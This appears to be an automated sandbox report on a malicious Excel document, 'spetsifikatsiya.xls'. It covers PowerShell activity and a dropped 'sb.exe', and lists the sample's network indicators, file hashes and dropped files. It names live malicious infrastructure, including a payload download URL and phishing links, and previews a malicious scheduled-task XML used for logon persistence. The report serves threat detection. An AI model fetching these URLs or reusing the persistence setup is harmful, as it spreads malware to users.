Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.winXLS@40/19@2/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.5% (good quality ratio 0.5%) Quality average: 55.8% Quality standard deviation: 26.6%
HCA Information:	Successful, ratio: 66% Number of executed functions: 203 Number of non-executed functions: 235
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 8.248.137.254, 8.248.135.254, 67.26.83.254, 8.253.95.249, 8.248.147.254 Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:06:46	API Interceptor	459x Sleep call for process: powershell.exe modified
10:07:06	API Interceptor	991x Sleep call for process: sb.exe modified
10:07:44	API Interceptor	1x Sleep call for process: schtasks.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.157.162.81	ptoovvKZ80.exe	Get hash	malicious	Browse
	spetsifikatsiya.xls	Get hash	malicious	Browse
	EnJsj6nuD4.exe	Get hash	malicious	Browse
	zlkcd7HSQp.exe	Get hash	malicious	Browse
	machine.xls	Get hash	malicious	Browse
	qdnLoWn1E8.exe	Get hash	malicious	Browse
	ogYg79jWpR.exe	Get hash	malicious	Browse
	ORDER PMX-PT-2001 STOCK+NOVO.exe	Get hash	malicious	Browse
	DHL_10177_R293_DOCUMENT.exe	Get hash	malicious	Browse
	Order_List_PO# 081928.pdf.exe	Get hash	malicious	Browse
	CF09550WJ901.pdf.exe	Get hash	malicious	Browse
	Order List PO# 081927.pdf.exe	Get hash	malicious	Browse
	Doc#662020094753525765301499.pdf.exe	Get hash	malicious	Browse
	Doc#6620200947535257653014.pdf.exe	Get hash	malicious	Browse
	Doc#66202009475352576530141.pdf.exe	Get hash	malicious	Browse
	Doc#66202009475352576503588.pdf.exe	Get hash	malicious	Browse
79.124.76.20	spetsifikatsiya.xls	Get hash	malicious	Browse	speed-bg.com/kapa2/ferrazio/typla/jbm/GWqhcX68z24xeAO.exe
104.22.0.232	sample products trade reference.docx	Get hash	malicious	Browse	cutt.ly/
104.22.0.232	Request_for_Quotation.xlsm	Get hash	malicious	Browse	cutt.ly/gdvAeui

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
speed-bg.com	spetsifikatsiya.xls	Get hash	malicious	Browse	79.124.76.20
cutt.ly	1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls	Get hash	malicious	Browse	172.67.8.238
	spetsifikatsiya.xls	Get hash	malicious	Browse	104.22.1.232
	New Avinode Plans and Prices 2021.xls	Get hash	malicious	Browse	172.67.8.238
	spetsifikatsiya.xls	Get hash	malicious	Browse	104.22.0.232
	spetsifikatsiya.xls	Get hash	malicious	Browse	172.67.8.238
	AdviceSlip.xls	Get hash	malicious	Browse	104.22.0.232
	file.xls	Get hash	malicious	Browse	104.22.1.232
	file.xls	Get hash	malicious	Browse	172.67.8.238
	file.xls	Get hash	malicious	Browse	172.67.8.238
	output.xls	Get hash	malicious	Browse	172.67.8.238
	SecuriteInfo.com.Heur.20246.xls	Get hash	malicious	Browse	172.67.8.238
	SecuriteInfo.com.Exploit.Siggen3.5270.27062.xls	Get hash	malicious	Browse	104.22.1.232
	SecuriteInfo.com.Exploit.Siggen3.5270.27062.xls	Get hash	malicious	Browse	104.22.0.232
	30689741.xls	Get hash	malicious	Browse	172.67.8.238
	95773220855.xls	Get hash	malicious	Browse	104.22.1.232
	95773220855.xls	Get hash	malicious	Browse	172.67.8.238
	MT-000137.xls	Get hash	malicious	Browse	172.67.8.238
	95773220855.xls	Get hash	malicious	Browse	104.22.0.232
	MT-000137.xls	Get hash	malicious	Browse	104.22.1.232
	MT-000137.xls	Get hash	malicious	Browse	104.22.0.232

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TELEPOINTBG	spetsifikatsiya.xls	Get hash	malicious	Browse	79.124.76.20
	document-1932597637.xls	Get hash	malicious	Browse	217.174.152.52
	document-1932597637.xls	Get hash	malicious	Browse	217.174.152.52
	document-1961450761.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909441643.xls	Get hash	malicious	Browse	217.174.152.52
	document-1961450761.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909441643.xls	Get hash	malicious	Browse	217.174.152.52
	document-1942925331.xls	Get hash	malicious	Browse	217.174.152.52
	document-1942925331.xls	Get hash	malicious	Browse	217.174.152.52
	document-1892683183.xls	Get hash	malicious	Browse	217.174.152.52
	document-1892683183.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909894964.xls	Get hash	malicious	Browse	217.174.152.52
	document-1909894964.xls	Get hash	malicious	Browse	217.174.152.52
	document-1965918496.xls	Get hash	malicious	Browse	217.174.152.52
	document-1965918496.xls	Get hash	malicious	Browse	217.174.152.52
	document-1901557343.xls	Get hash	malicious	Browse	217.174.152.52
	document-1901557343.xls	Get hash	malicious	Browse	217.174.152.52
	document-1958527977.xls	Get hash	malicious	Browse	217.174.152.52
	document-1958527977.xls	Get hash	malicious	Browse	217.174.152.52
	document-1840475437.xls	Get hash	malicious	Browse	217.174.152.52
OBE-EUROPEObenetworkEuropeSE	ptoovvKZ80.exe	Get hash	malicious	Browse	185.157.162.81
	spetsifikatsiya.xls	Get hash	malicious	Browse	185.157.162.81
	EnJsj6nuD4.exe	Get hash	malicious	Browse	185.157.162.81
	AdviceSlip.xls	Get hash	malicious	Browse	217.64.149.169
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	50404868-c352-422f-a608-7fd64b335eec.exe	Get hash	malicious	Browse	185.157.161.86
	DHL_file 187652345643476245.exe	Get hash	malicious	Browse	185.157.160.233
	FedExs AWB#5305323204643.exe	Get hash	malicious	Browse	185.157.160.233
	URGENT QUOTATION 473833057.exe	Get hash	malicious	Browse	185.157.160.233
	P-O Doc #6620200947535257653.exe	Get hash	malicious	Browse	185.157.160.233
	SecuriteInfo.com.Trojan.DownLoader36.26524.23979.exe	Get hash	malicious	Browse	185.157.160.202
	https://cdn-102.anonfiles.com/74S7h0zcpf/89a5d721-1608220696/Red%20Engine%20Cracked.zip	Get hash	malicious	Browse	217.64.149.161
	74725794.pdf.exe	Get hash	malicious	Browse	185.157.161.86
	zlkcd7HSQp.exe	Get hash	malicious	Browse	185.157.162.81
	machine.xls	Get hash	malicious	Browse	185.157.162.81
	Order_List_PO# 0819289.exe	Get hash	malicious	Browse	185.157.161.86
	qdnLoWn1E8.exe	Get hash	malicious	Browse	185.157.162.81
CLOUDFLARENETUS	bank Acct Numbr-pdf.exe	Get hash	malicious	Browse	104.28.4.151
	mASBqbWDup.exe	Get hash	malicious	Browse	1.1.1.1
	https://veringer.com/wp-includes/wwii11/GXQb6HLGz4AV965RfN9795cyETWfmdzBUarzFg4YkqaJnfdTD/	Get hash	malicious	Browse	104.16.94.65
	order (2021.01.05).exe	Get hash	malicious	Browse	104.24.107.188
	https://micrrosoftonline13392123112a.typeform.com/to/y7uCHr2N	Get hash	malicious	Browse	104.20.185.68
	https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/?utm_source=redcanary&utm_medium=email&utm_campaign=Blog%20Digest-2020-11-05T09:00:54.888-07:00&mkt_tok=eyJpIjoiWmpKbVlUTXpPRGMzTTJRMSIsInQiOiJtMm9iYWJESHd5VldFUTF2a05zeEdtVUdMNms3cHVcL01OcW9hYUlwOElYZFwvNkdvd0UzV0x2SDdNZVlIMWFTSG1jS28zM0JIamh3YXRvcmU0K2htaTJpTlFLbjNNaWswT2NxYlhXdElEZHVzMlFaclpoTUFzZk1ibTV0SGVwSCs2In0%3D	Get hash	malicious	Browse	104.17.71.206
	https://xcampers.no/Access/preview/secure/microsoft/	Get hash	malicious	Browse	104.16.18.94
	__.htm	Get hash	malicious	Browse	104.16.19.94
	https://needaboatmoved.com/01-04-2021.html	Get hash	malicious	Browse	104.16.18.94
	#U260e#Ufe0f.htm	Get hash	malicious	Browse	104.16.19.94
	#U260e#Ufe0f.htm	Get hash	malicious	Browse	104.16.19.94
	https://patrickphimr5.github.io/memoaideivozx/dsfriet.html?bbre=dxcfdgoiss	Get hash	malicious	Browse	104.28.12.251
	1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls	Get hash	malicious	Browse	172.67.167.122
	output.xls	Get hash	malicious	Browse	104.20.139.65
	Rfq 214871_TAWI Catalog.exe	Get hash	malicious	Browse	172.67.144.71
	output.xls	Get hash	malicious	Browse	104.20.138.65
	output.xls	Get hash	malicious	Browse	172.67.1.225
	output.xls	Get hash	malicious	Browse	104.20.138.65
	UaTCQiQ6XK.exe	Get hash	malicious	Browse	162.159.135.232
	spetsifikatsiya.xls	Get hash	malicious	Browse	104.22.1.232

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls	Get hash	malicious	Browse	104.22.0.232
	output.xls	Get hash	malicious	Browse	104.22.0.232
	output.xls	Get hash	malicious	Browse	104.22.0.232
	spetsifikatsiya.xls	Get hash	malicious	Browse	104.22.0.232
	New Avinode Plans and Prices 2021.xls	Get hash	malicious	Browse	104.22.0.232
	spetsifikatsiya.xls	Get hash	malicious	Browse	104.22.0.232
	Shipping Details DHL.xls	Get hash	malicious	Browse	104.22.0.232
	AdviceSlip.xls	Get hash	malicious	Browse	104.22.0.232
	PI 99-14.doc__.rtf	Get hash	malicious	Browse	104.22.0.232
	Archivo.doc	Get hash	malicious	Browse	104.22.0.232
	QUOTATION FP-240018.doc	Get hash	malicious	Browse	104.22.0.232
	QUOTATION FP-240018.doc	Get hash	malicious	Browse	104.22.0.232
	MDYL rj0810666.doc	Get hash	malicious	Browse	104.22.0.232
	List 2020_12_21 OZV3903.doc	Get hash	malicious	Browse	104.22.0.232
	Export Order Vene.xls	Get hash	malicious	Browse	104.22.0.232
	info-122020-40367.doc	Get hash	malicious	Browse	104.22.0.232
	Invoice S2517158.doc	Get hash	malicious	Browse	104.22.0.232
	RQ-10375.xls	Get hash	malicious	Browse	104.22.0.232
	RQ-10375.xls	Get hash	malicious	Browse	104.22.0.232
	AIRWAY-BILLDELIVERY.xls	Get hash	malicious	Browse	104.22.0.232

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.123186963792904
Encrypted:	false
SSDEEP:	6:kKMMSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:kMdkPlE99SNxAhUegeT2
MD5:	4B253AB84A067EFA601E08DC32AE23A8
SHA1:	64BA6477BA7D8FC39DD599B7372F07557A589FB1
SHA-256:	A343C71A688FFFFDBB9A85005324D734D3CADF30AC036A8C1F53C90F994C09F9
SHA-512:	990137327ED42082D80B6FE0B24C8C4B9F0CB3571EDF4080855925C89CF8AE62E537622C05F208618D84809E9B2526799399BB468516A2E3493731F221096345
Malicious:	false
Preview:	p...... ................(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\Local\Temp\A5EE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	218510
Entropy (8bit):	7.934860707644141
Encrypted:	false
SSDEEP:	6144:nrqIUBvQUkM6fWRFTcf35skaMNVMTV5GcQgXYr1w:nP6vQVpfWvTG5kS6T3JX9
MD5:	9904713510D253B3F2F01F012BCFDEF8
SHA1:	222C0A56770F3AB8C59387DA9D5FD17B4D6A74A0
SHA-256:	728C00ECA6E33D81736B8E0336963CFC299B0CA4362FF99FCBADB3F0C4C616DF
SHA-512:	D6C597C7BFE8099822215AB6905D72FBAD3C956A9EED74A743036FB5B0A53E46327CCA6F8ED58184ABEBC7C0AD3640937BF57C2B8B6F89988BCFA2EB71DBFBA7
Malicious:	false
Preview:	...N.0...H.C.+J\8 ..r.e......=M...<..g...U...DI..~..xfz...x....]V.V..^i.....Oy..L.)a.........l.....U;.Y.R...e.V`..8ZY.hE.... .R4..&.k..K.R....M..B..T.....\;V..\|.Q5.!.-E"....H...-Ay.jI...A(l..5U.....R..!.{..5;Lm...~.E..;%#6..*....xAa. ..9.u....VP<....Ki...>.../.a.....V.L.%VY!..wbn..v......R..n/O../..\.XO;...L.......D..xw=f...:.. ...<".a......[.A=%j.....=.CE.-....s..4U...H.+.....\|....AL..]....D.'..wf!.@.a.n..>.......PK..........!....-............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Cab41F0.tmp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\Local\Temp\Tar41F1.tmp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	152533
Entropy (8bit):	6.31602258454967
Encrypted:	false
SSDEEP:	1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
MD5:	D0682A3C344DFC62FB18D5A539F81F61
SHA1:	09D3E9B899785DA377DF2518C6175D70CCF9DA33
SHA-256:	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
SHA-512:	0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
Malicious:	false
Preview:	0..S....H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\tmp8C58.tmp Download File
Process:	C:\Users\user\AppData\Roaming\sb.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1624
Entropy (8bit):	5.147486668538602
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBJtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3x
MD5:	381406DD05BEE1CE60411F8DBD5F46E3
SHA1:	3A2FDD7A6CC740AB90B6FC54D0539C377FBCDAF7
SHA-256:	0CCE73DE36BA35D93C8A0F3A0AFB95C55D81043F399D19513309DB67132EC6A1
SHA-512:	95C445B5188B90E24545DBF3FC71A90B4B160A41E7E951576CF1DFC4138782188A8958078555C8812EDB33AFDDE603414E68D83F13C558078D26564E951EE9E0
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 5 17:06:44 2021, atime=Tue Jan 5 17:06:44 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.48538863395965
Encrypted:	false
SSDEEP:	12:85Q00LgXg/XAlCPCHaXtB8XzB/B6RvX+WnicvbwbDtZ3YilMMEpxRljK6TdJP9TK:85w/XTd6joYegDv3qfrNru/
MD5:	BA7A333A3867690B9D518625085D6650
SHA1:	8CA687D16DF545CAC98A659C2A627D9ED8DEB98F
SHA-256:	CBD2F4B2335F4706775E3F9A3DC8082EBF25E6C8AA2BACF9A62CB1359E6BCE80
SHA-512:	9E1B0BEE2801393F0057AECE8CA307CC09008A3590586B54F2DA5F4A8FD67173963032E9FAA8D446711B5E81156E23DF2C6B5CE1714237A4D1851F7BD8520338
Malicious:	false
Preview:	L..................F...........7G..u......u.......0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....%R...Desktop.d......QK.X%R...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\688098\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......688098..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	98
Entropy (8bit):	4.29593984928515
Encrypted:	false
SSDEEP:	3:oyBVomMF3zd8CO8zd8CmMF3zd8Cv:dj6F3Z8sZ8UF3Z8s
MD5:	121AA7B0E15C0A2FAF081C912D00A1CF
SHA1:	DA137B4B637D550C95187F23D8860A85B5A7CB86
SHA-256:	7187575715B0E3C58A5A71F3A35094E3715F2A84B60565020E5B1C6AA2DD6832
SHA-512:	8AE109F6E0B7C2BB853DEE3016B72628F43950664FA6991E22C29BE24BE25B5A0777420490EED644BC6F9847323C4CFD24FF80578BB59FD8C836672FC13F063F
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..spetsifikatsiya.LNK=0..spetsifikatsiya.LNK=0..[xls]..spetsifikatsiya.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\spetsifikatsiya.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Tue Jan 5 17:06:44 2021, atime=Tue Jan 5 17:06:44 2021, length=242176, window=hide
Category:	dropped
Size (bytes):	2078
Entropy (8bit):	4.545541836017036
Encrypted:	false
SSDEEP:	48:83n/XT0jF495JT2fQh23n/XT0jF495JT2fQ/:8X/XojF495Z2fQh2X/XojF495Z2fQ/
MD5:	EF223B7B327E3789182050A2602E83D4
SHA1:	B46D2CF3819BA372AC0DB7354521B3393907DF73
SHA-256:	937ADE0977735AF43997DB9BBC095D45170E5768128937CC0F7D760DBE3360C2
SHA-512:	935D70429911A79AB9492F5930F0752AEAE83FC732A6A9AFB44377810AEBBEBA8386F96013EF7DFEAA1B1B0AFC33F516AEE45B0A71A2CDED929CFE9AB61134DA
Malicious:	false
Preview:	L..................F.... ...f5...{..u.........................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....%R. .SPETSI~1.XLS..T.......Q.y.Q.y...8.....................s.p.e.t.s.i.f.i.k.a.t.s.i.y.a...x.l.s.......}...............-...8...[............?J......C:\Users\..#...................\\688098\Users.user\Desktop\spetsifikatsiya.xls.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.p.e.t.s.i.f.i.k.a.t.s.i.y.a...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......688098..........D_....3N...W...9F.C.........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0BGTGBBF7Q6SKHN9BKYX.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5877382331325665
Encrypted:	false
SSDEEP:	96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCwor/zkKYyHyf8R8lUVbIu:cywo1z8yMHnor/zkRf8RDIu
MD5:	88AF443197F04FC07F6BE051B7084403
SHA1:	AFAD4C89B8CA751992F0C636B23DD4EA2E08D3B9
SHA-256:	24E7ED8A16E78FD8367F86C9DA45FD5456CC2313DB87C7585526D47C3552E3E8
SHA-512:	D7E76297B4ED2A53C288D3AF7928C9EF03FFC2ABCD868DFF34CB69622E4F3EA0491B327027FEE7C4B9C6FB92A34560A2AE86154B69E12DE9149E0576FE1E1F2A
Malicious:	false
